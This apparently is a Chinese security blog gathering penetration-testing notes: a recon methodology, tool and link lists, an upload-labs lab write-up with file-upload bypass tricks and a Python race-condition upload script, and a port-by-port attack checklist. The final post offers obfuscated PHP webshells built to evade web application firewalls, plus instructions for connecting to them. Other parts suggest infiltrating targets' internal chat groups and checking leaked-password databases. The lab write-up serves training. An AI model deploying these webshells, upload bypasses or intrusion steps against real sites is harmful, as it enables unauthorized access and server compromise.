标签： <span>渗透</span>

Security notes

MyAttackC…

2021年7月14日2021年7月14日
by harmoc

持续补完中......

1. 信息收集

1.1. 域名与IP

IP方面，更多的通过一个主机安全的视角去考虑：

绕CDN找出⽬标所有真实ip段
找⽬标的各种Web管理后台登录⼝
批量抓取⽬标所有真实C段 Web banner
批量对⽬标所有真实C段进⾏基础服务端⼝扫描探测识别尝试

域名方面，更多从Web安全视角去考虑：

域名解析系统信息，尝试⽬标DNS是否允许区域传送,如果不允许则继续尝试⼦域爆破
⽬标Git、Svn、DS_store⾥泄露的各类敏感⽂件⽹站⽬录扫描 [ 查找⽬标⽹站泄露的各类敏感⽂件, ⽹站备份⽂件, 敏感配置⽂件, 源码 , 别⼈的webshell, 等等等...]
分析⽬标app Web请求
能否借助js探针搜集⽬标内⽹信息

1.2. 端口与服务

80 443的Web服务

3306的mysql、6379的redis，以及各种特定端口所指向的服务都是标准攻击面

8000--10000的各种自定义服务（很多Web页也开在这儿）

1.3. OSINT

查目标与控股单位，如果内网连通即高效攻击
在单位公布的重要方案、文档里可能找到IP、默认账号密码等源代码招投标信息，摸排供应链信息，并分析⽬标直接供应商 [尤其是技术外包]
移动端资产收集：微信公众号和小程序还是用手机微信搜索比较方便，也可以通过搜狗来发现目标大概有哪些公众号，往往还是抓包测试。
Shodan、Fofa、Zoomeye等空间搜索引擎
Github、Google hacking等传统信息泄露收集方式
从各第三⽅历史漏洞库中查找⽬标曾经泄露的各种敏感账号密码 [ 国内⽬标很好使 ]
想办法混⼊⽬标的各种内部QQ群 / 微信群
搜集⽬标学⽣学号 / 员⼯⼯号 / ⽬标邮箱 [ 并顺⼿到各个社⼯库中去批量查询这些邮箱曾经是否泄露过密码 ]

1.4. C段

因为现在很多都上阿里云，C段有点难用。

HW时候还挺好用，目标C段可以找到其他服务打进去，很多时候同C段的其他机器防护不严密。

2. 打点

2.1. 前期收集服务1/0Day

2.2. 前期OSINT成果可利用的点

2.3. 钓鱼（结合社工）

2.4. 迂回上下游

2.5. 近源渗透/供应链攻击/...——突出一个非常规

3. 当前目标整理

3.1. 凭证信息

尝试深层凭证读取及凭证复用。

3.2. 本地通往他处途径

根据目标可达性确定代理以方便渗透。

通向其他目标，考虑后期方向。

4. 横纵向扩散

4.1. 机制性的扩散方式

比如拿下的机器是域管，拿到天擎权限之类，还有PTH等等

4.2. 常规对主机渗透思路扩散

扫内网主机，看开了什么服务，从各种服务的利用上考虑，当然包括Web服务。

X. Repeat

千剑

个人CTFTool…

2018年10月6日2018年10月6日
by harmoc

最初刚打ctf时候，拿精灵表哥和其他大神整理的工具包做的开端。

现在虽说不能算CTF老手吧，勉强算个熟手。把我积累的工具包分享一下，希望能有固定的人喜欢上CTF。

最近学弟学妹们也开始带新人了，就把自己github的仓库更新了一下，整理了一份给新人。里面有因为比赛特有trick找的，有公认比较好用的，还有一些从各种各样的地方收集来的工具。

emmm，在t00ls放了一份，顺手也放到blog好了。

第一个上10star的项目233333

Github地址：
https://github.com/Harmoc/CTFTools

千剑

Blackhat2…

2018年8月27日
by harmoc

Android，iOS和移动黑客

易受攻击的iOS应用程序：Swift版

https://github.com/prateek147/DVIA-v2

代码评估

OWASP依赖性检查

https://github.com/jeremylong/DependencyCheck

美洲狮扫描

https://github.com/pumasecurity/puma-scan

加密

DeepViolet：SSL / TLS扫描API和工具

https://github.com/spoofzu/DeepViolet

数据取证和事件响应

初学者到专家

https://github.com/bro/bro

CyBot：开源威胁情报聊天机器人

https://github.com/CylanceSPEAR/CyBot

LogonTracer

https://github.com/JPCERTCC/LogonTracer

rastrea2r（重新加载！）：用Gusto和Style收集和狩猎IOC

https://github.com/rastrea2r/rastrea2r

RedHunt OS（VM）：用于对手仿真和威胁搜索的虚拟机

https://github.com/redhuntlabs/RedHunt-OS

剥削与道德黑客

AVET：AntiVirus Evasion Tool

https://github.com/govolution/avet

DSP：Docker安全游乐场

https://github.com/giper45/DockerSecurityPlayground

hideNsneak：攻击混淆框架

https://github.com/rmikehodges/hideNsneak

梅林

https://github.com/Ne0nd0g/merlin

RouterSploit

https://github.com/threat9/routersploit

硬件/嵌入式

ChipWhisperer

https://github.com/newaetech/chipwhisperer

JTAGulator ：揭开硬件安全的致命弱点

https://github.com/grandideastudio/jtagulator

Micro-Renovator：将处理器固件带入代码

https://github.com/syncsrc/MicroRenovator

TumbleRF：RF模糊变得容易

https://github.com/riverloopsec/tumblerf

Walrus：充分利用您的卡片克隆设备

https://github.com/TeamWalrus/Walrus

物联网

物联网设备的可扩展动态分析框架

https://github.com/sycurelab/DECAF

BLE CTF项目

https://github.com/hackgnar/ble_ctf

WHID注射器和WHID Elite：新一代HID攻击性设备

https://github.com/whid-injector/WHID

恶意软件防御

为每位安全研究人员提供高级深度学习分析平台

https://github.com/intel/Resilient-ML-Research-Platform

EKTotal

https://github.com/nao-sec/ektotal

固件审计：Blue Teams和DFIR的平台固件安全自动化

https://github.com/PreOS-Security/fwaudit

MaliceIO

https://github.com/maliceio/malice

目标 – 参见MacOS安全工具

https://github.com/objective-see

恶意软件进攻

BloodHound 1.5

https://github.com/BloodHoundAD/BloodHound

网络攻击

军械库

https://github.com/depthsecurity/armory

Chiron：一种先进的IPv6安全评估和渗透测试框架

https://github.com/aatlasis/Chiron

DELTA：SDN安全评估框架

https://github.com/OpenNetworkingFoundation/DELTA

Mallet：任意协议的拦截代理

https://github.com/sensepost/mallet

PowerUpSQL：用于在企业环境中攻击SQL Server的PowerShell工具包

https://github.com/NetSPI/PowerUpSQL

WarBerryPi

https://github.com/secgroundzero/warberry

网络防御

ANWI（全新无线IDS）：5美元的WIDS

https://github.com/SanketKarpe/anwi

CHIRON：基于家庭的网络分析和机器学习威胁检测框架

https://github.com/jzadeh/chiron-elk

云安全套件：AWS / GCP / Azure安全审计的一站式工具

https://github.com/SecurityFTW/cs-suite

DejaVu：一个开源欺骗框架

https://github.com/bhdresh/Dejavu

OSINT – 开源智能

DataSploit 2.0

https://github.com/DataSploit/datasploit

Dradis 框架：了解如何将报告时间缩短一半

https://github.com/dradis/dradis-ce

逆向工程

Snake：恶意软件存储动物园

https://github.com/countercept/snake

智能电网/工业安全

GRFICS ：工业控制模拟的图形现实主义框架

https://github.com/djformby/GRFICS

漏洞评估

用于机器学习模型的对抗鲁棒性工具箱

https://github.com/IBM/adversarial-robustness-toolbox

Android动态分析工具（ADA）

https://github.com/ANELKAOS/ada

射箭：开源漏洞评估和管理

https://github.com/archerysec/archerysec

boofuzz

https://github.com/jtpereyda/boofuzz

BTA

https://github.com/airbus-seclab/bta

深度利用

https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit

Halcyon IDE：适用于Nmap脚本开发人员

https://github.com/s4n7h0/Halcyon

SimpleRisk

https://github.com/simplerisk

TROMMEL

https://github.com/CERTCC/trommel

Web AppSec

看看NGINX的ModSec 3.0：软件Web应用程序防火墙

https://github.com/SpiderLabs/ModSecurity

Astra：REST API的自动安全测试

https://github.com/flipkart-incubator/Astra

Burp Replicator：自动化复杂漏洞的复制

https://github.com/PortSwigger/replicator

OWASP进攻性Web测试框架

https://github.com/owtf/owtf

OWASP JoomScan项目

https://github.com/rezasp/joomscan

WSSAT

https://github.com/YalcinYolalan/WSSAT

后记：
感谢t00ls 雨苁cong表哥的整理。
https://www.t00ls.net/thread-47249-1-1.html

千剑

Misc

使用Google、Bing搜索语法进行子域名的查找。比如site:xx.com就能找到xx.com的部分子域名

加上文件搜索site:xx.com filetype:doc|docx|pdf|xls|txt|mdb|ppt又能搜索出另一部分子域名。

在常用的域名前加上oa、zabbix、nagios、cacti、erp、sap、crm等前缀构造二级或者三级域名

查找备案号:http://www.beianbeian.com/search-1/%E4%BA%ACICP%E8%AF%81030173%E5%8F%B7

智能DNS暴力破解软文章:https://www.foo.be/papers/sdbf.pdf

流行的子域名前缀：https://github.com/bitquark/dnspop/tree/master/results

（非官方）用于https://dnsdumpster.com/的 Python API：https://github.com/PaulSec/API-dnsdumpster.com

在线搜索

在线查找

VirusTotal: https://www.virustotal.com/#/home/search
dnsdumpster:https://dnsdumpster.com/
hackertarget：https://hackertarget.com/
netcraft：http://searchdns.netcraft.com/
dnsdumpsterhttps://dnsdumpster.com/
threatcrowd：https://www.threatcrowd.org/
riddler：https://riddler.io/
passivetotal：https://api.passivetotal.org
censys：https://www.censys.io
cloudpiercer：https://cloudpiercer.org/
shodan: https://api.shodan.io
dnsdb：http://www.dnsdb.org/f/
DNSdigger：http://www.dnsdigger.com/
dnsdb_info：https://www.dnsdb.info/
全球DNS搜索引擎：https://dnsdb.io/zh-cn/
子域名爆破：http://www.itxueke.com/tools/subdomain/
domains-index.com：domains-index.com
子域名查询：http://domain.hide.city/
微步：https://x.threatbook.cn/
子域名查询: https://phpinfo.me/domain/
爱站网子域名反查: https://dns.aizhan.com/
云悉：http://www.yunsee.cn/
子域名爆破：http://i.links.cn/subdomain/
scans.io：https://scans.io/
T00ls：https://www.t00ls.net/domain.html
findsubdomains：https://findsubdomains.com/
securitytrails：https://securitytrails.com/dns-trails
find-subdomains-of-domain:https://pentest-tools.com/information-gathering/find-subdomains-of-domain

通过AS号( Autonomous System Numbers)进行查找：

https://asn.cymru.com/cgi-bin/whois.cgi
http://bgp.he.net/
https://nmap.org/nsedoc/scripts/targets-asn.html

证书透明度：

证书透明度（英语：Certificate Transparency，简称CT）也称证书透明、证书透明化，它是一个实验性的IETF开源标准和开源框架，目的是监测和审计数字证书。通过证书日志、监控和审计系统，证书透明度使网站用户和域名持有者可以识别不当或恶意签发的证书，以及识别数字证书认证机构（CA）的作为。而其中SSL/TLS证书通常包含域名、子域名和电子邮件，直接可以作为子域名搜索的方法之一。
https://crt.sh/ （如%.twitter.com）
https://censys.io/
https://developers.facebook.com/tools/ct/
https://google.com/transparencyreport/https/ct/
https://certspotter.com/api/v0/certs?domain=example.com

参考：

https://www.t00ls.net/viewthread.php?tid=46568&highlight=%E5%AD%90%E5%9F%9F%E5%90%8D
https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6
https://blog.sweepatic.com/art-of-subdomain-enumeration/amp/?__twitter_impression=true
https://www.anquanke.com/post/id/84764
https://github.com/We5ter/Scanners-Box/blob/master/README_CN.md

Security notes

渗透三字经

2018年7月3日
by harmoc

进谷歌找注入

没注入就旁注

没旁注用0day

没0day 猜目录

没目录就嗅探

拿不下去自杀

爆账户找后台

传小马放大马

拿权限挂页面

放暗链清数据

T00ls老哥给的渗透三字经233333，有意思。

Write up

从upload-l…

2018年6月5日2018年6月5日
by harmoc

前言

最近在T00ls看到了一份上传漏洞总结。做了一下，感觉确实设计的蛮不错。

上传漏洞类型总结

0x01.限制上传的逻辑在前端

禁用js或者F12修改即可

0x02.仅限制Content-Type

Burp截包，修改Content-Type，然后放行，即可绕过

0x03.可重写文件解析规则绕过

即先上传个.htaccess文件，让解析规则变更

<FilesMatch ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>

0x04.后缀名黑名单、过滤

黑名单

比如文件名后缀大小写混合绕过。.php改成.phP然后上传即可。感觉和XSS的一些过滤绕过非常相似。

可被利用过滤

这种只删除一次php的，即可：
双写文件名绕过，文件名改成xx.pphphp

0x05.可被利用Windows系统的特性

利用Windows系统的文件名特性

比如文件名最后增加点和空格，写成.php.，上传后保存在Windows系统上的文件名最后的一个.会被去掉，实际上保存的文件名就是.php

Windows文件流特性绕过

文件名改成.php::$DATA，上传成功后保存的文件名其实是.php

0x06.可被截断绕过

上传路径名%00截断绕过

上传的文件名写成11.jpg, save_path改成../upload/11.php%00，最后保存下来的文件就是11.php

0x07.文件头检查

添加GIF图片的文件头GIF89a，绕过GIF图片检查。

0x08.渲染函数导致可用图片webshell

原理：将一个正常显示的图片，上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分，将Webshell代码插在该部分，然后上传。具体实现需要自己编写Python程序，人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。

0x09.条件竞争

利用条件竞争删除文件时间差绕过。

Write up

Pass-01

上传的限制逻辑在前端，js里，限制js执行即可上传成功。

Pass-02

截断上传数据包，修改Content-Type为image/gif，然后放行数据包

Pass-03

重写文件解析规则绕过。上传先上传一个名为.htaccess文件，内容如下：

<FilesMatch "03.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后再上传一个03.jpg

执行上传的03.jpg脚本

Pass-04

方法同Pass-03, 重写文件解析规则绕过

Pass-05

文件名后缀大小写混合绕过。05.php改成05.phP然后上传

Pass-06

利用Windows系统的文件名特性。文件名最后增加点和空格，写成06.php.，上传后保存在Windows系统上的文件名最后的一个.会被去掉，实际上保存的文件名就是06.php

Pass-07

原理同Pass-06，文件名后加点，改成07.php.

Pass-08

Windows文件流特性绕过，文件名改成08.php::$DATA，上传成功后保存的文件名其实是08.php

Pass-09

原理同Pass-06，上传文件名后加上点+空格+点，改为09.php. .

Pass-10

双写文件名绕过，文件名改成10.pphphp

Pass-11

上传路径名%00截断绕过。上传的文件名写成11.jpg, save_path改成../upload/11.php%00，最后保存下来的文件就是11.php

Pass-12

原理同Pass-11，上传路径0x00绕过。利用Burpsuite的Hex功能将save_path改成../upload/12.php【二进制00】形式

Pass-13

绕过文件头检查，添加GIF图片的文件头GIF89a，绕过GIF图片检查。

使用命令copy normal.jpg /b + shell.php /a webshell.jpg，将php一句话追加到jpg图片末尾，代码不全的话，人工补充完整。形成一个包含Webshell代码的新jpg图片，然后直接上传即可。JPG一句话shell参考示例

png图片处理方式同上。PNG一句话shell参考示例

Pass-14

原理和示例同Pass-13，添加GIF图片的文件头绕过检查

png图片webshell上传同Pass-13。

jpg/jpeg图片webshell上传存在问题，正常的图片也上传不了，等待作者调整。

Pass-15

原理同Pass-13，添加GIF图片的文件头绕过检查

png图片webshell上传同Pass-13。

jpg/jpeg图片webshell上传同Pass-13。

Pass-16

这里提供一个包含一句话webshell代码并可以绕过PHP的imagecreatefromgif函数的GIF图片示例。

打开被渲染后的图片，Webshell代码仍然存在

提供一个jpg格式图片绕过imagecreatefromjpeg函数渲染的一个示例文件。直接上传示例文件会触发Warning警告，并提示文件不是jpg格式的图片。但是实际上已经上传成功，而且示例文件名没有改变。

从上面上传jpg图片可以看到我们想复杂了，程序没有对渲染异常进行处理，直接在正常png图片内插入webshell代码，然后上传示例文件即可，并不需要图片是正常的图片。

程序依然没有对文件重命名，携带webshell的无效损坏png图片直接被上传成功。

Pass-17

利用条件竞争删除文件时间差绕过。使用命令pip install hackhttp安装hackhttp模块，运行下面的Python代码即可。如果还是删除太快，可以适当调整线程并发数。

#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey

import hackhttp
from multiprocessing.dummy import Pool as ThreadPool


def upload(lists):
    hh = hackhttp.hackhttp()
    raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341

-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream

<?php assert($_POST["LandGrey"])?>
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"

上传
-----------------------------6696274297634--
"""
    code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
    print(str(code) + "\r")


pool = ThreadPool(10)
pool.map(upload, range(10000))
pool.close()
pool.join()

在脚本运行的时候，访问Webshell

Pass-18

刚开始没有找到绕过方法，最后下载作者Github提供的打包环境，利用上传重命名竞争+Apache解析漏洞，成功绕过。

上传名字为18.php.7Z的文件，快速重复提交该数据包，会提示文件已经被上传，但没有被重命名。

快速提交上面的数据包，可以让文件名字不被重命名上传成功。

然后利用Apache的解析漏洞，即可获得shell

Pass-19

原理同Pass-11，上传的文件名用0x00绕过。改成19.php【二进制00】.1.jpg

后记

有些非预期解
等找到更多思路继续补充

感谢出靶场的c0ny1和写write up的LandGrey兄弟，学习之后一定会将知识传承下去。
学有所成之时定不敢生私心，定尽力分享，为黑客精神续命QWQ。

这也许算新时代的继往圣之绝学吧。

参考

靶场 https://github.com/c0ny1/upload-labs

Write up https://github.com/LandGrey/upload-labs-writeup

Security notes

基础渗透测试思路（…

2018年6月1日2018年6月4日
by harmoc

前言

在T00ls看到的渗透思路总结，感觉收获还是蛮大的，放到Blog备忘。

百变不离其宗的渗透测试 基础

        一.得到目标网站第一步我们该做什么？

                1.查看审核元素 （浏览器插件顶替）

                2.判断网站类型

                3.查看网站功能

                4.检测敏感端口

                5.检测其他资产

                6.收集公司(个人)信息

                7.查看C段（忽略）

        一.① 这些有什么用？（参照上面）
                第一步主要是看审核元素得到返回头信息能得到中间件，服务器，程序编程语言信息，Javascript版本信息。
                        中间件：(iis一定支持asp，asa,cer)(apache常见就是php)（tomcat,jboss,weblogic,jetty为常见的JAVA程序中间件）

                                Iis在低版本常见的漏洞有：
                                        1.解析漏洞
                                                IIS6.0（asp/aspx）
                                                        1.文件解析漏洞：文件名为*.asp;.jsp
                                                        2.目录解析漏洞：文件夹名为*.asp 那么这个文件        |名下面的所有文件就会解析为asp文件
                                                        3.IIS6.0默认可执行的还有*.asa |*.cer *.cdx                                
                                                IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞
                                                        1.正常后缀加/*.php 如：|xxx.com/upload/1.jpg/1.php
                                                        2.*.php.123.234 或|*.php.123;*.php.jpg..jps 以此类推下去直到解析为止 (php,asp,aspx)（适量）
                                                        3.建议也多试几次iis6.0的解析漏洞，有些时        候也是可行的。
                                                                                                                                                                                                                                                                        详见解析漏洞注解
                                        2.目录列举漏洞
                                        3.PUT文件写入

                                Apache在低版本常见的漏洞有：
                                        解析漏洞
                                                1.从右往左判断解析 如：*.php.rar.jpg.png等等把常见后缀都|写上去直到解析为止（适量）
                                                2.*.php 改为*.php1,,*.php2,*.php3,*.php4 |以此类推下去直到解析为止（适量）
                                                                                                                                                                                                                                                                        详见解析漏洞注解
                                        Win下~特性

                                tomcat漏洞也有但是没什么利用价值
                                        一般都是弱口令
                                        进去后部署war包getshell

                                jboss常见漏洞：
                                        1.jboss配置不当（人为）

                                        2.jboss命令执行

                                        3.jboss反序列

                                weblogic常见漏洞：
                                        1.weblogic弱口令（人为）

                                        2.weblogic反序列

                                        3.weblogic SSRF漏洞

                                jetty常见漏洞：
                                        目录遍历

                                                                                                                                                                                                                                                                        详见中间件漏洞注解

                        服务器可以用或许大小写判断，返回头信息以及ping来确认。

                        编程语言可以测试index.{php,asp,aspx,jsp,do,action}也可以在返回头信息看到。
                                一般.do .action都可以测试下有没有Struts2漏洞

                        Javascript版本在看审核元素或者默认文件名就可以看到。
                                Javascript低版本脆弱库可以XSS（虽然没啥危害）

                        第一步可能遇到的漏洞以及风险（渗透测试报告专坑）：
                                Struts2漏洞
                                中间件泄露（中间件低版本）
                                中间件漏洞
                                Javascript脆弱库xss
                                Javascript低版本
                                未设置cookie的Httponly属性
                                cookie固定

                第二步很重要也很简单。
                        首先确定好了网站类型，我们怼站的思路就会慢慢浮现出来。
                                门户：
                                        地方门户：做的挺好的一般是DZ，phpcms 等等
                                        小型企业门户：xiaocms 等等

                                论坛：
                                        国内论坛基本都是：DZ，winphp,其他轻社区cms

                                博客：
                                        wordpress，Zblog，typecho，emlog等等

                                商场：
                                        ecshop等等

                        老站点直接测试注入先手工，xss漏洞也多，无waf情况下抱着Sqlmap就上。商场的另加逻辑漏洞

                                查找robots.txt 后台 敏感目录泄露查找是什么cms 确认cms就可以在漏洞库查找改cms漏洞进行测试。

                        可疑参数也是要测试下注入或xss

                        切记有WAF情况下不得大线程，除非知道其网站有漏洞，并且可以绕过。

                        第二步可能遇到的漏洞以及风险（渗透测试报告专坑）：
                                cms漏洞
                                逻辑漏洞（详见看逻辑漏洞注释）
                                Robot.txt文件WEB站点结构泄露漏洞
                                注入漏洞
                                XSS跨站漏洞
                                等

                第三步熟悉网站功能。

                        是否有搜索框能否注入或XSS

                        是否有留言框能否XSS打cookie

                        有登录尝试登录框是否有sql注入或XSS

                        是否有验证码
                                验证码能否被识别
                                验证码能否被无视

                        注册是否有sql漏洞

                        是否能注册管理权限账号

                        验证手机的情况下
                                是否能无限轰炸
                                是否能任意更改
                                验证码是否有时间验证
                                验证码是否相同
                                是否能爆破验证码

                        登录是否能越权

                        个人信息是否有存储型XSS

                        个人信息能否CSRF
                                有验证机制能否绕过

                        头像上传是否能getshell
                                直接getshell
                                解析漏洞
                                上传漏洞
                                是否能上传txt

                        修改密码能否CSRF
                                有验证机制能否绕过

                        找回密码是手机号码验证
                                是否能无限轰炸
                                是否能任意更改
                                验证码是否有时间验证
                                验证码是否相同
                                是否能爆破验证码

                        是否有购买商品功能
                                任意修改支付金额
                                任意修改商品数量
                                收货地址存储型XSS


                        第三步可能遇到的漏洞以及风险（渗透测试报告专坑）：
                                sql注入漏洞
                                xss漏洞
                                未限制用户可输入长度
                                用户爆破
                                验证码识别
                                验证码无视
                                明文传输
                                HTTP连接的登录请求表单
                                短信轰炸
                                任意注册
                                平行越权
                                垂直越权
                                管理员权限注册
                                csrf漏洞
                                头像上传getshell
                                上传漏洞（能传txt或者html什么的也可以）
                                支付漏洞
                                任意更改商品数量
                                任意修改运费
                                等

                第四步检测是否有可疑端口或cve漏洞（推荐nmap，或ness）        
                        文件共享访问端口：
                                21 FTP
                                        弱口令，爆破
                                        匿名访问

                                137,139 Smaba服务
                                        弱口令，爆破
                                        未授权访问
                                        远程代码执行漏洞CVE-2015-0240等

                                389 LDAP协议
                                        爆破，弱口令

                                2049 NFS服务
                                        未授权访问
                                        未限制ip以及用户权限

                        远程连接服务端口：
                                22 SSH
                                        28退格漏洞
                                        OpenSSL漏洞（心脏出血）

                                23 Telnet服务
                                        弱口令，爆破
                                        匿名访问

                                81,8080 tomct apache  nginx axis2
                                        弱口令爆破manager
                                        http慢速攻击

                                3389 win远程桌面连接
                                        爆破
                                        shift粘贴键后门
                                        mas12-020

                                5632 Pcanywhere
                                        拒绝服务攻击

                                5900+桌面id 5901 5902等 vnc
                                        弱口令，爆破
                                        拒绝服务攻击(CVE-2015-5239)
                                        权限提升(CVE-2013-6886)
                        Web应用服务端口：
                                7001 Weblogic
                                        弱口令(weblogic,weblogic|system,weblogic可weblogic123|portaladmin,guest) ，爆破
                                        后台部署war包getshell
                                        java反序列 
                                        SSRF

                                1098/1099/4444/4445/8080/8009/8083/8093 Jboss
                                        弱口令，爆破
                                        java反序列
                                        配置不当：远程代码执行

                                908* 第一个应用是9080 第二个是9081；控制台9090 Websphere
                                        弱口令，爆破
                                        任意文件泄露（CVE-2014-0823）
                                        java反序列

                                8080(http),3700(IIOP,4848(控制台) GlassFish
                                        弱口令，爆破
                                        任意文件读取
                                        认证绕过

                                8080,8089 Jenkins
                                        弱口令，爆破
                                        java反序列
                                        未授权访问

                                8080 Resin
                                        目录遍历
                                        远程文件读取

                                8080 Jetty 
                                        远程共享缓冲区溢出

                                1352 Lotus
                                        弱口令，爆破
                                        信息泄露
                                        跨站脚本攻击

                        数据库端口：
                                3306 Mysql数据库
                                        弱口令，爆破
                                        身份验证漏洞(CVE-2012-2122)
                                        拒绝服务攻击
                                        phpmyadmin万能密码：用户名；localhost'@'@ 密码任意

                                1433 Mssql数据库
                                        弱口令，爆破

                                1521 (数据库端口),1158(Oracle EMCTL端口),8080(Oracle XDB数据库),210(Oracle XDB FTP 服务) Oracle
                                        弱口令，爆破

                                5432 PostgreSQL数据库
                                        弱口令，爆破

                                27017 MongoDB数据库
                                        弱口令，爆破
                                        未授权访问

                                6379 Redis数据库
                                        未授权访问+配合ssh key提权

                                5000(服务端口)，4100(监听端口)，4200(备份端口) SysBase数据
                                        弱口令，爆破
                                        命令注入

                                5000 DBW数据库
                                        安全限制绕过(CVE-2015-1922)

                        邮箱服务端口：
                                25(smtp)，465(smtps) SMTP协议 
                                        弱口令，爆破
                                        未授权访问

                                109(POP2),110(POP3),995(POP3S) POP3协议
                                        弱口令，爆破
                                        未授权访问

                                143(imap),993(imaps) IMAP协议
                                        弱口令，爆破
                                        配置不当

                                53 DNS服务器
                                        区域传输漏洞

                                67,68,546(DHCP Failover做双机热备的) DHCP服务
                                        DHCP劫持

                                161 SNMP
                                        弱口令，爆破

                        其他端口：
                                2181 Zookeeper服务
                                        未授权访问

                                8069 Zabbix服务
                                        远程代码执行

                                9200，9300 elesticsearch服务
                                        未授权访问
                                        远程代码执行
                                        文件遍历
                                        低版本webshell植入

                                11211 mencache服务
                                        未授权访问
                                        配置不当

                                512,513,514 Linux R服务
                                        使用rlogin直接登录对方系统

                                1090,1099, RML
                                        远程命令执行
                                        java反序列
                                        调用rmi方式执行命令

                                873 Rsync服务
                                        未授权访问
                                        本地提权

                                1080 Socket代理
                                        爆破，弱口令

                第四步可能遇到的漏洞以及风险（渗透测试报告专坑）：        
                        参上

                第五步查看资产 这里包括了子域名，App，微信公众号，旁站等

                        参1-4步 

                        App，微信公众号 只要有调用他们web服务的 正常测试，如公众号都是调用微信的功能就不必测试。
                                撞库(用户爆破)，越权，信息轰炸等 逻辑漏洞较多

                第五步可能遇到的漏洞以及风险（渗透测试报告专坑）：                        
                        注入漏洞
                        XSS跨站漏洞
                        用户爆破
                        无验证码
                        验证码可识别
                        越权漏洞
                        信息轰炸
                        CSRF漏洞
                        明文传输
                        头像上传getshell
                        上传漏洞（能传txt或者html什么的也可以）
                        支付漏洞
                        任意更改商品数量
                        任意注册
                        任意修改运费
                        HTTP连接的登录请求表单
                        等


                第五步收集资料有：域名信息，是否有开源。
                        域名信息：
                                注册人QQ
                                注册人邮箱
                                注册人姓名
                                注册人手机
                                注册人采用ID
                                        以上可以社工库走一波
                                        组合密码
                                                得到邮箱或QQ可以充分发挥想象 (最好就邮箱)

                        开源可以下载查看审计，以及查看是否残留配置信息等重要信息。

                第五步可能遇到的漏洞以及风险（渗透测试报告专坑）：
                        重要信息泄露
                        等


        除了使用Burp 抓包查看包数据或Nmap（其他工具）检测端口，在未确认是否有WAF或有WAF的时候尽量不要对网站使用其他工具对其大线程访问（扫描）。



        2.熟悉一下工具（没有waf情况下可以使用）

                综合扫描器
                        AWVS
                        APPSCAN
                        企业级扫描器（绿盟、启明星辰等等）
                        等等

                子域名枚举
                        subDomainsBrute (经典的子域名爆破枚举脚本)
                        Layer (字典强大并且功能强大的EXE子域名爆破工具)
                        subbrute  （根据DNS记录查询子域名)
                        哮天犬
                        等等


                注入，XSS测试
                        啊D(asp注入专用)
                        穿山甲
                        sqlmap
                        BBQSQL (盲注比较好)
                        SQLiScanner (一款基于SQLMAP和Charles的被动SQL注入漏洞扫描工具)
                        burp+sqlmap=被动式扫描
                        GourdScanV2 （被动式漏洞扫描)
                        BruteXSS (支持get，post的xss检测脚本)可自行改字典
                        xss_scan (批量扫描xss的python脚本）可自行改字典
                        等等


                信息泄漏扫描
                        御剑
                        burp (导入字典)
                        DirBrute（多线程WEB目录爆破工具）
                        BBScan(一个迷你的信息泄漏批量扫描脚本) 可自行改字典
                        GitHack (.git文件夹泄漏利用工具)
                        wafw00f(WAF产品指纹识别)
                        bypass_waf （waf自动暴破）
                        sslscan （ssl类型识别)
                        FingerPrint (web应用指纹识别)
                        [url]https://github.com/3xp10it/mytools/blob/master/xcdn.py[/url]（获取cdn背后的真实ip）
                        F-NAScan (网络资产信息扫描, ICMP存活探测,端口扫描，端口指纹服务识别）
                        F-MiddlewareScan （中间件扫描）
                        RASscan(端口服务扫描)
                        Nmap(端口服务扫描)
                        m7lrv(集合cms扫描器)
                        等等


                弱口令+爆破
                        VerifyReader(伏宸验证码识别工具)
                        PKAV HTTP Fuzzer(带验证码枚举)
                        burp
                        htpwdScan (一个简单的HTTP暴力破解、撞库攻击脚本)
                        fenghuangscanner_v3 (端口及弱口令检测)
                        F-Scrack (对各类服务进行弱口令检测的脚本)
                        genpAss （中国特色的弱口令生成器）
                        crack_ssh （go写的协程版的ssh\redis\mongodb弱口令破解工具）
                        Sreg (通过输入email、phone、username的返回用户注册的所有互联网护照信息)
                        等等


                内网
                        出门左拐看内网文章

来源

https://www.t00ls.net/thread-45957-1-1.html

千剑

在T00ls的一句…

2018年5月18日2018年6月4日
by harmoc

1.利用md5绕过waf的一句话

本体：

<?php
        $str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';
        $str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));
        $str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));
        if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
                $str4 = strrev($_POST['a']);
                $str5 = strrev($str4);
                $str3($str5);
    }
?>

本质

<?php
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
    assert($_POST['a']);
}
?>

利用方式

MD5("3fion0hj5965698jhh") == "2858b958f59138771eae3b0c2ceda426"
http://x.x.x.x/x.php?a=3fion0hj5965698jhh 菜刀密码a可以连上。

但是执行php代码需要反转：
比如正常a=phpinfo(); 这个需要a=;)(ofniphp才能正确执行。绕waf

2.get_defined_vars函数马

<?php 
eval(get_defined_vars()['_POST'][true]);
?>

3.array_push函数马

$arr = array('0','1',array('0',$_GET['1']));
array_push($arr,'3',array('0','1',array('0')));
